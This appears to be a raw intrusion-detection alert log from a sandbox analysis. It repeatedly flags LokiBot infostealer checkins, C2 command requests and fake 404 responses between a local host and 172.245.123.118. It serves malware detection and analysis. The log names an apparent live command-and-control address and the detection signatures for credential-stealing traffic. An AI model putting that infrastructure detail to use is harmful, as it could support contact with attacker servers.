                                                              2025-01-07T11:02:43.363394+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549952172.245.123.1180TCP
                                                              2025-01-07T11:02:43.852429+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549952172.245.123.1180TCP
                                                              2025-01-07T11:02:43.852429+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549952172.245.123.1180TCP
                                                              2025-01-07T11:02:43.857197+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549952TCP
                                                              2025-01-07T11:02:44.019633+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549958172.245.123.1180TCP
                                                              2025-01-07T11:02:44.019633+01002025381ET MALWARE LokiBot Checkin1192.168.2.549958172.245.123.1180TCP
                                                              2025-01-07T11:02:44.019633+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549958172.245.123.1180TCP
                                                              2025-01-07T11:02:44.522317+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549958172.245.123.1180TCP
                                                              2025-01-07T11:02:44.522317+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549958172.245.123.1180TCP
                                                              2025-01-07T11:02:44.522405+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549958TCP
                                                              2025-01-07T11:02:44.684154+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549964172.245.123.1180TCP
                                                              2025-01-07T11:02:44.684154+01002025381ET MALWARE LokiBot Checkin1192.168.2.549964172.245.123.1180TCP
                                                              2025-01-07T11:02:44.684154+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549964172.245.123.1180TCP
                                                              2025-01-07T11:02:45.350075+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549964172.245.123.1180TCP
                                                              2025-01-07T11:02:45.350075+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549964172.245.123.1180TCP
                                                              2025-01-07T11:02:45.355010+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549964TCP
                                                              2025-01-07T11:02:45.507465+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549969172.245.123.1180TCP
                                                              2025-01-07T11:02:45.507465+01002025381ET MALWARE LokiBot Checkin1192.168.2.549969172.245.123.1180TCP
                                                              2025-01-07T11:02:45.507465+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549969172.245.123.1180TCP
                                                              2025-01-07T11:02:46.030026+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549969172.245.123.1180TCP
                                                              2025-01-07T11:02:46.030026+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549969172.245.123.1180TCP
                                                              2025-01-07T11:02:46.030084+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549969TCP
                                                              2025-01-07T11:02:46.180115+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549971172.245.123.1180TCP
                                                              2025-01-07T11:02:46.180115+01002025381ET MALWARE LokiBot Checkin1192.168.2.549971172.245.123.1180TCP
                                                              2025-01-07T11:02:46.180115+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549971172.245.123.1180TCP
                                                              2025-01-07T11:02:46.699521+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549971172.245.123.1180TCP
                                                              2025-01-07T11:02:46.699521+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549971172.245.123.1180TCP
                                                              2025-01-07T11:02:46.699686+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549971TCP
                                                              2025-01-07T11:02:46.851221+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549976172.245.123.1180TCP
                                                              2025-01-07T11:02:46.851221+01002025381ET MALWARE LokiBot Checkin1192.168.2.549976172.245.123.1180TCP
                                                              2025-01-07T11:02:46.851221+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549976172.245.123.1180TCP
                                                              2025-01-07T11:02:47.374652+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549976172.245.123.1180TCP
                                                              2025-01-07T11:02:47.374652+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549976172.245.123.1180TCP
                                                              2025-01-07T11:02:47.381254+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549976TCP
                                                              2025-01-07T11:02:47.795111+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549982172.245.123.1180TCP
                                                              2025-01-07T11:02:47.795111+01002025381ET MALWARE LokiBot Checkin1192.168.2.549982172.245.123.1180TCP
                                                              2025-01-07T11:02:47.795111+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549982172.245.123.1180TCP
                                                              2025-01-07T11:02:48.292985+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549982172.245.123.1180TCP
                                                              2025-01-07T11:02:48.292985+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549982172.245.123.1180TCP
                                                              2025-01-07T11:02:48.298557+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549982TCP
                                                              2025-01-07T11:02:48.451009+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549987172.245.123.1180TCP
                                                              2025-01-07T11:02:48.451009+01002025381ET MALWARE LokiBot Checkin1192.168.2.549987172.245.123.1180TCP
                                                              2025-01-07T11:02:48.451009+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549987172.245.123.1180TCP
                                                              2025-01-07T11:02:49.000377+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549987172.245.123.1180TCP
                                                              2025-01-07T11:02:49.000377+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549987172.245.123.1180TCP
                                                              2025-01-07T11:02:49.006487+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549987TCP
                                                              2025-01-07T11:02:49.150118+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549994172.245.123.1180TCP
                                                              2025-01-07T11:02:49.150118+01002025381ET MALWARE LokiBot Checkin1192.168.2.549994172.245.123.1180TCP
                                                              2025-01-07T11:02:49.150118+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.549994172.245.123.1180TCP
                                                              2025-01-07T11:02:49.647470+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549994172.245.123.1180TCP
                                                              2025-01-07T11:02:49.647470+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.549994172.245.123.1180TCP
                                                              2025-01-07T11:02:49.647518+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.549994TCP
                                                              2025-01-07T11:02:49.806913+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550000172.245.123.1180TCP
                                                              2025-01-07T11:02:49.806913+01002025381ET MALWARE LokiBot Checkin1192.168.2.550000172.245.123.1180TCP
                                                              2025-01-07T11:02:49.806913+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550000172.245.123.1180TCP
                                                              2025-01-07T11:02:50.327734+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550000172.245.123.1180TCP
                                                              2025-01-07T11:02:50.327734+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550000172.245.123.1180TCP
                                                              2025-01-07T11:02:50.336299+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550000TCP
                                                              2025-01-07T11:02:50.480746+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550006172.245.123.1180TCP
                                                              2025-01-07T11:02:50.480746+01002025381ET MALWARE LokiBot Checkin1192.168.2.550006172.245.123.1180TCP
                                                              2025-01-07T11:02:50.480746+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550006172.245.123.1180TCP
                                                              2025-01-07T11:02:51.066587+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550006172.245.123.1180TCP
                                                              2025-01-07T11:02:51.066587+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550006172.245.123.1180TCP
                                                              2025-01-07T11:02:51.071482+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550006TCP
                                                              2025-01-07T11:02:51.210960+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550009172.245.123.1180TCP
                                                              2025-01-07T11:02:51.210960+01002025381ET MALWARE LokiBot Checkin1192.168.2.550009172.245.123.1180TCP
                                                              2025-01-07T11:02:51.210960+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550009172.245.123.1180TCP
                                                              2025-01-07T11:02:51.758580+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550009172.245.123.1180TCP
                                                              2025-01-07T11:02:51.758580+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550009172.245.123.1180TCP
                                                              2025-01-07T11:02:51.758585+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550009TCP
                                                              2025-01-07T11:02:51.916359+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550015172.245.123.1180TCP
                                                              2025-01-07T11:02:51.916359+01002025381ET MALWARE LokiBot Checkin1192.168.2.550015172.245.123.1180TCP
                                                              2025-01-07T11:02:51.916359+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550015172.245.123.1180TCP
                                                              2025-01-07T11:02:52.460403+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550015172.245.123.1180TCP
                                                              2025-01-07T11:02:52.460403+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550015172.245.123.1180TCP
                                                              2025-01-07T11:02:52.460410+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550015TCP
                                                              2025-01-07T11:02:52.618644+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550020172.245.123.1180TCP
                                                              2025-01-07T11:02:52.618644+01002025381ET MALWARE LokiBot Checkin1192.168.2.550020172.245.123.1180TCP
                                                              2025-01-07T11:02:52.618644+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550020172.245.123.1180TCP
                                                              2025-01-07T11:02:53.129836+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550020172.245.123.1180TCP
                                                              2025-01-07T11:02:53.129836+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550020172.245.123.1180TCP
                                                              2025-01-07T11:02:53.129904+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550020TCP
                                                              2025-01-07T11:02:53.273172+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550026172.245.123.1180TCP
                                                              2025-01-07T11:02:53.273172+01002025381ET MALWARE LokiBot Checkin1192.168.2.550026172.245.123.1180TCP
                                                              2025-01-07T11:02:53.273172+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550026172.245.123.1180TCP
                                                              2025-01-07T11:02:53.777572+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550026172.245.123.1180TCP
                                                              2025-01-07T11:02:53.777572+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550026172.245.123.1180TCP
                                                              2025-01-07T11:02:53.782384+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550026TCP
                                                              2025-01-07T11:02:53.936803+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550032172.245.123.1180TCP
                                                              2025-01-07T11:02:53.936803+01002025381ET MALWARE LokiBot Checkin1192.168.2.550032172.245.123.1180TCP
                                                              2025-01-07T11:02:53.936803+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550032172.245.123.1180TCP
                                                              2025-01-07T11:02:54.694689+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550032172.245.123.1180TCP
                                                              2025-01-07T11:02:54.694689+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550032172.245.123.1180TCP
                                                              2025-01-07T11:02:54.695350+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550032TCP
                                                              2025-01-07T11:02:55.171759+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550038172.245.123.1180TCP
                                                              2025-01-07T11:02:55.171759+01002025381ET MALWARE LokiBot Checkin1192.168.2.550038172.245.123.1180TCP
                                                              2025-01-07T11:02:55.171759+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550038172.245.123.1180TCP
                                                              2025-01-07T11:02:55.670454+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550038172.245.123.1180TCP
                                                              2025-01-07T11:02:55.670454+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550038172.245.123.1180TCP
                                                              2025-01-07T11:02:55.675259+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550038TCP
                                                              2025-01-07T11:02:55.829665+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550044172.245.123.1180TCP
                                                              2025-01-07T11:02:55.829665+01002025381ET MALWARE LokiBot Checkin1192.168.2.550044172.245.123.1180TCP
                                                              2025-01-07T11:02:55.829665+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550044172.245.123.1180TCP
                                                              2025-01-07T11:02:56.381416+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550044172.245.123.1180TCP
                                                              2025-01-07T11:02:56.381416+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550044172.245.123.1180TCP
                                                              2025-01-07T11:02:56.386259+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550044TCP
                                                              2025-01-07T11:02:56.557892+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550050172.245.123.1180TCP
                                                              2025-01-07T11:02:56.557892+01002025381ET MALWARE LokiBot Checkin1192.168.2.550050172.245.123.1180TCP
                                                              2025-01-07T11:02:56.557892+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550050172.245.123.1180TCP
                                                              2025-01-07T11:02:57.059679+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550050172.245.123.1180TCP
                                                              2025-01-07T11:02:57.059679+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550050172.245.123.1180TCP
                                                              2025-01-07T11:02:57.059724+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550050TCP
                                                              2025-01-07T11:02:57.234366+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550055172.245.123.1180TCP
                                                              2025-01-07T11:02:57.234366+01002025381ET MALWARE LokiBot Checkin1192.168.2.550055172.245.123.1180TCP
                                                              2025-01-07T11:02:57.234366+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550055172.245.123.1180TCP
                                                              2025-01-07T11:02:57.747009+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550055172.245.123.1180TCP
                                                              2025-01-07T11:02:57.747009+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550055172.245.123.1180TCP
                                                              2025-01-07T11:02:57.747262+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550055TCP
                                                              2025-01-07T11:02:57.904891+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550061172.245.123.1180TCP
                                                              2025-01-07T11:02:57.904891+01002025381ET MALWARE LokiBot Checkin1192.168.2.550061172.245.123.1180TCP
                                                              2025-01-07T11:02:57.904891+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550061172.245.123.1180TCP
                                                              2025-01-07T11:02:58.413612+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550061172.245.123.1180TCP
                                                              2025-01-07T11:02:58.413612+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550061172.245.123.1180TCP
                                                              2025-01-07T11:02:58.413629+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550061TCP
                                                              2025-01-07T11:02:58.574189+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550066172.245.123.1180TCP
                                                              2025-01-07T11:02:58.574189+01002025381ET MALWARE LokiBot Checkin1192.168.2.550066172.245.123.1180TCP
                                                              2025-01-07T11:02:58.574189+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550066172.245.123.1180TCP
                                                              2025-01-07T11:02:59.073831+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550066172.245.123.1180TCP
                                                              2025-01-07T11:02:59.073831+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550066172.245.123.1180TCP
                                                              2025-01-07T11:02:59.073850+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550066TCP
                                                              2025-01-07T11:02:59.229112+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550067172.245.123.1180TCP
                                                              2025-01-07T11:02:59.229112+01002025381ET MALWARE LokiBot Checkin1192.168.2.550067172.245.123.1180TCP
                                                              2025-01-07T11:02:59.229112+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550067172.245.123.1180TCP
                                                              2025-01-07T11:02:59.743774+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550067172.245.123.1180TCP
                                                              2025-01-07T11:02:59.743774+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550067172.245.123.1180TCP
                                                              2025-01-07T11:02:59.744118+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550067TCP
                                                              2025-01-07T11:02:59.900572+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550068172.245.123.1180TCP
                                                              2025-01-07T11:02:59.900572+01002025381ET MALWARE LokiBot Checkin1192.168.2.550068172.245.123.1180TCP
                                                              2025-01-07T11:02:59.900572+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550068172.245.123.1180TCP
                                                              2025-01-07T11:03:00.408178+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550068172.245.123.1180TCP
                                                              2025-01-07T11:03:00.408178+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550068172.245.123.1180TCP
                                                              2025-01-07T11:03:00.408286+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550068TCP
                                                              2025-01-07T11:03:00.558517+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550069172.245.123.1180TCP
                                                              2025-01-07T11:03:00.558517+01002025381ET MALWARE LokiBot Checkin1192.168.2.550069172.245.123.1180TCP
                                                              2025-01-07T11:03:00.558517+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550069172.245.123.1180TCP
                                                              2025-01-07T11:03:01.053021+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550069172.245.123.1180TCP
                                                              2025-01-07T11:03:01.053021+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550069172.245.123.1180TCP
                                                              2025-01-07T11:03:01.060718+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550069TCP
                                                              2025-01-07T11:03:01.212085+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550070172.245.123.1180TCP
                                                              2025-01-07T11:03:01.212085+01002025381ET MALWARE LokiBot Checkin1192.168.2.550070172.245.123.1180TCP
                                                              2025-01-07T11:03:01.212085+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550070172.245.123.1180TCP
                                                              2025-01-07T11:03:01.734889+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550070172.245.123.1180TCP
                                                              2025-01-07T11:03:01.734889+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550070172.245.123.1180TCP
                                                              2025-01-07T11:03:01.746358+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550070TCP
                                                              2025-01-07T11:03:01.900649+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550071172.245.123.1180TCP
                                                              2025-01-07T11:03:01.900649+01002025381ET MALWARE LokiBot Checkin1192.168.2.550071172.245.123.1180TCP
                                                              2025-01-07T11:03:01.900649+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550071172.245.123.1180TCP
                                                              2025-01-07T11:03:02.402684+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550071172.245.123.1180TCP
                                                              2025-01-07T11:03:02.402684+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550071172.245.123.1180TCP
                                                              2025-01-07T11:03:02.419565+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550071TCP
                                                              2025-01-07T11:03:02.675531+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550072172.245.123.1180TCP
                                                              2025-01-07T11:03:02.675531+01002025381ET MALWARE LokiBot Checkin1192.168.2.550072172.245.123.1180TCP
                                                              2025-01-07T11:03:02.675531+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550072172.245.123.1180TCP
                                                              2025-01-07T11:03:03.187911+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550072172.245.123.1180TCP
                                                              2025-01-07T11:03:03.187911+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550072172.245.123.1180TCP
                                                              2025-01-07T11:03:03.192775+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550072TCP
                                                              2025-01-07T11:03:03.337291+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550073172.245.123.1180TCP
                                                              2025-01-07T11:03:03.337291+01002025381ET MALWARE LokiBot Checkin1192.168.2.550073172.245.123.1180TCP
                                                              2025-01-07T11:03:03.337291+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550073172.245.123.1180TCP
                                                              2025-01-07T11:03:03.861850+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550073172.245.123.1180TCP
                                                              2025-01-07T11:03:03.861850+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550073172.245.123.1180TCP
                                                              2025-01-07T11:03:03.866629+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550073TCP
                                                              2025-01-07T11:03:04.013533+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550074172.245.123.1180TCP
                                                              2025-01-07T11:03:04.013533+01002025381ET MALWARE LokiBot Checkin1192.168.2.550074172.245.123.1180TCP
                                                              2025-01-07T11:03:04.013533+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550074172.245.123.1180TCP
                                                              2025-01-07T11:03:04.533061+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550074172.245.123.1180TCP
                                                              2025-01-07T11:03:04.533061+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550074172.245.123.1180TCP
                                                              2025-01-07T11:03:04.533080+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550074TCP
                                                              2025-01-07T11:03:04.679878+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550075172.245.123.1180TCP
                                                              2025-01-07T11:03:04.679878+01002025381ET MALWARE LokiBot Checkin1192.168.2.550075172.245.123.1180TCP
                                                              2025-01-07T11:03:04.679878+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550075172.245.123.1180TCP
                                                              2025-01-07T11:03:05.175668+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550075172.245.123.1180TCP
                                                              2025-01-07T11:03:05.175668+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550075172.245.123.1180TCP
                                                              2025-01-07T11:03:05.175810+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550075TCP
                                                              2025-01-07T11:03:05.319446+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550076172.245.123.1180TCP
                                                              2025-01-07T11:03:05.319446+01002025381ET MALWARE LokiBot Checkin1192.168.2.550076172.245.123.1180TCP
                                                              2025-01-07T11:03:05.319446+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550076172.245.123.1180TCP
                                                              2025-01-07T11:03:05.822128+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550076172.245.123.1180TCP
                                                              2025-01-07T11:03:05.822128+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550076172.245.123.1180TCP
                                                              2025-01-07T11:03:05.822165+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550076TCP
                                                              2025-01-07T11:03:05.975970+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550077172.245.123.1180TCP
                                                              2025-01-07T11:03:05.975970+01002025381ET MALWARE LokiBot Checkin1192.168.2.550077172.245.123.1180TCP
                                                              2025-01-07T11:03:05.975970+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550077172.245.123.1180TCP
                                                              2025-01-07T11:03:06.488704+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550077172.245.123.1180TCP
                                                              2025-01-07T11:03:06.488704+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550077172.245.123.1180TCP
                                                              2025-01-07T11:03:06.488803+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550077TCP
                                                              2025-01-07T11:03:06.639844+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550078172.245.123.1180TCP
                                                              2025-01-07T11:03:06.639844+01002025381ET MALWARE LokiBot Checkin1192.168.2.550078172.245.123.1180TCP
                                                              2025-01-07T11:03:06.639844+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550078172.245.123.1180TCP
                                                              2025-01-07T11:03:07.161033+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550078172.245.123.1180TCP
                                                              2025-01-07T11:03:07.161033+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550078172.245.123.1180TCP
                                                              2025-01-07T11:03:07.165978+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550078TCP
                                                              2025-01-07T11:03:07.327650+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550079172.245.123.1180TCP
                                                              2025-01-07T11:03:07.327650+01002025381ET MALWARE LokiBot Checkin1192.168.2.550079172.245.123.1180TCP
                                                              2025-01-07T11:03:07.327650+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550079172.245.123.1180TCP
                                                              2025-01-07T11:03:07.986400+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550079172.245.123.1180TCP
                                                              2025-01-07T11:03:07.986400+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550079172.245.123.1180TCP
                                                              2025-01-07T11:03:07.991205+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550079TCP
                                                              2025-01-07T11:03:08.132275+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550080172.245.123.1180TCP
                                                              2025-01-07T11:03:08.132275+01002025381ET MALWARE LokiBot Checkin1192.168.2.550080172.245.123.1180TCP
                                                              2025-01-07T11:03:08.132275+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550080172.245.123.1180TCP
                                                              2025-01-07T11:03:08.655207+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550080172.245.123.1180TCP
                                                              2025-01-07T11:03:08.655207+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550080172.245.123.1180TCP
                                                              2025-01-07T11:03:08.660237+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550080TCP
                                                              2025-01-07T11:03:08.806380+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550081172.245.123.1180TCP
                                                              2025-01-07T11:03:08.806380+01002025381ET MALWARE LokiBot Checkin1192.168.2.550081172.245.123.1180TCP
                                                              2025-01-07T11:03:08.806380+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550081172.245.123.1180TCP
                                                              2025-01-07T11:03:09.305924+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.550081172.245.123.1180TCP
                                                              2025-01-07T11:03:09.305924+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.550081172.245.123.1180TCP
                                                              2025-01-07T11:03:09.310820+01002025483ET MALWARE LokiBot Fake 404 Response1172.245.123.1180192.168.2.550081TCP
                                                              2025-01-07T11:03:09.459976+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.550082172.245.123.1180TCP
                                                              2025-01-07T11:03:09.459976+01002025381ET MALWARE LokiBot Checkin1192.168.2.550082172.245.123.1180TCP
                                                              2025-01-07T11:03:09.459976+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.550082172.245.123.1180TCP
